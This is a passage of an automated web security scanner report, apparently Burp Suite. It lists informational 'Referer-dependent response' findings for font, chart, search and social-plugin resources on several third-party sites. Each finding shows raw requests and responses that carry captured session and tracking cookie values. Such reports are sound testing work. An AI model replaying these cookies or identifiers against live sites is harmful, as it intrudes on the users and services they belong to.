Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
<div id="sidebar">

           <?php
$pageTitle = '{embed:pageTitle}';
$sectionTitle = '{embed:sectionTitle}';
$subsectionTitle = '{embed:subsectionTitle}';
?>


<ul id="subnav">
...[SNIP]...

13. Referer-dependent response
There are 12 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



13.1. http://f.fontdeck.com/f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff

Request 1

GET /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa25771a-69c3-6dc8-936e-8033d70586df

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:42 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: b014036c-ff33-e93b-97db-8f909bf61d6b
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2835-b8d98c17c3f427304fa74db3d742bf20"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 89574

wOFF
...[SNIP]...

Request 2

GET /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa25771a-69c3-6dc8-936e-8033d70586df

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 11:58:46 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff
on this server.</p>
</body></html>

13.2. http://f.fontdeck.com/f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff

Request 1

GET /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:41 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: 2c499d3b-50af-c0b1-9255-ec78552e32e1
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2837-51478a7f1aeb73d7491bb80279154a77"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 95890

wOFF
...[SNIP]...

Request 2

GET /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 11:58:46 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff
on this server.</p>
</body></html>

13.3. http://f.fontdeck.com/f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff

Request 1

GET /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:41 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: 8be144b0-a86d-6e6f-bd09-a267f35a4ee6
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2840-a6acb2b4196ba1b055dacda39851b85e"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 88182

wOFF
...[SNIP]...

Request 2

GET /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 11:58:46 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff
on this server.</p>
</body></html>

13.4. http://f.fontdeck.com/f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff

Request 1

GET /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/residential/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e55bc9ca-f3b4-edc5-ab87-8453ff79eeef

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:52:30 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: c1d7b5b4-8972-c5a7-c758-c5c107af1cf9
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2841-e8295edda0096c1c4085dbeafb819964"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 90534

wOFF
...[SNIP]...

Request 2

GET /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e55bc9ca-f3b4-edc5-ab87-8453ff79eeef

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 12:52:34 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff
on this server.</p>
</body></html>

13.5. http://ichart.finance.yahoo.com/instrument/1.0/%5EDJI/chart

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ichart.finance.yahoo.com
Path:   /instrument/1.0/%5EDJI/chart

Request 1

GET /instrument/1.0/%5EDJI/chart;range=1d/image;size=200x101 HTTP/1.1
Host: ichart.finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 6 Sep 2011 12:29:48 GMT
Expires: Tue, 6 Sep 2011 12:30:48 GMT
Content-Length: 3587
Connection: close
Content-Type: image/png

...[SNIP]...

Request 2

GET /instrument/1.0/%5EDJI/chart;range=1d/image;size=200x101 HTTP/1.1
Host: ichart.finance.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 12:29:49 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3268

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 403 Forbidden</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/403/*http://www.yahoo.com"><img
src=http://l.yimg.com/a/i/yahoo.gif
width=147 height=31 border=0 alt="Yahoo!"></a><div><a
href="http://us.rd
...[SNIP]...

13.6. http://sitesearch.comcast.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitesearch.comcast.com
Path:   /

Request 1

GET /?q=internet+phone&cat=com HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:23 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 47083
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
omcast.com Search - Version B";
s.events = "event11,event9";
s.eVar41 = "internet phone";
s.eVar34 = "Comcast.com Search - Version B";
s.prop18 = "internet phone";
s.prop19 = "http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F";
s.pageName = "Search Results - Page 1";
s.eVar31 = s.pageName;
//s.pageName="";

switch ('com') {
case "help":
s.eVar42 = "help support";
break;
case "pres":
s.eVar42 = "press release";
break;
case "blog":
s.eVar42 = "community results";
break;
default:
s.eVar42 = "all results";
}


/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code = s.t(); if (s_code) document.write(s_code)
//-->
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>

<!-- BEGIN BAYNOTE INCLUDE -->
<script type="text/javascript" src="static/baynote.js" defer="defer" ></script>
<!-- END BAYNOTE INCLUDE -->

</body>
</html>

Request 2

GET /?q=internet+phone&cat=com HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:53 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 46991
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
omcast.com Search - Version B";
s.events = "event11,event9";
s.eVar41 = "internet phone";
s.eVar34 = "Comcast.com Search - Version B";
s.prop18 = "internet phone";
s.prop19 = "no referrer";
s.pageName = "Search Results - Page 1";
s.eVar31 = s.pageName;
//s.pageName="";

switch ('com') {
case "help":
s.eVar42 = "help support";
break;
case "pres":
s.eVar42 = "press release";
break;
case "blog":
s.eVar42 = "community results";
break;
default:
s.eVar42 = "all results";
}


/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code = s.t(); if (s_code) document.write(s_code)
//-->
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>

<!-- BEGIN BAYNOTE INCLUDE -->
<script type="text/javascript" src="static/baynote.js" defer="defer" ></script>
<!-- END BAYNOTE INCLUDE -->

</body>
</html>

13.7. http://use.typekit.com/k/apb3goi-d.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://use.typekit.com
Path:   /k/apb3goi-d.css

Request 1

GET /k/apb3goi-d.css?3bb2a6e53c9684ffdc9a9af11f5b2a6290826e84c363a71fe46ed264f6c649f62b8595e0db1d36c453d7bbbb60e604aa52c910b56cd760b7906ce7a98c58b034d7fba1386a91a6f05e49cd HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Tue, 06 Sep 2011 12:26:24 GMT
ETag: "1623686887+gzip"
Expires: Tue, 06 Sep 2011 12:31:24 GMT
Last-Modified: Wed, 20 Jul 2011 14:05:22 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 190755

/*{"mac":"1:eea25b3c716176f4908aa0a2369d2bedd7312389c116bec7818805034c97b57b","version":"5167863","created":"2011-07-20T14:05:23Z","k":"0.9.12"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @name Myriad Pro
* @vendorname Adobe
* @vendorurl http://www.adobe.com/type/
* @licenseurl http://typekit.com/fonts/8e02145c28/eula
*
* (c) 2011 Typekit, Inc.
*/

@font-face {
font-family:"myriad-pro";
src:url(data:font/opentype;base64,
...[SNIP]...

Request 2

GET /k/apb3goi-d.css?3bb2a6e53c9684ffdc9a9af11f5b2a6290826e84c363a71fe46ed264f6c649f62b8595e0db1d36c453d7bbbb60e604aa52c910b56cd760b7906ce7a98c58b034d7fba1386a91a6f05e49cd HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 06 Sep 2011 12:26:30 GMT
Expires: Tue, 06 Sep 2011 12:31:30 GMT
Server: ECS (sjo/5235)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>

13.8. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.35.43
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 25783

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e660b2c9a6249745044162" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">8</div></td></tr></tbody></table></td><td 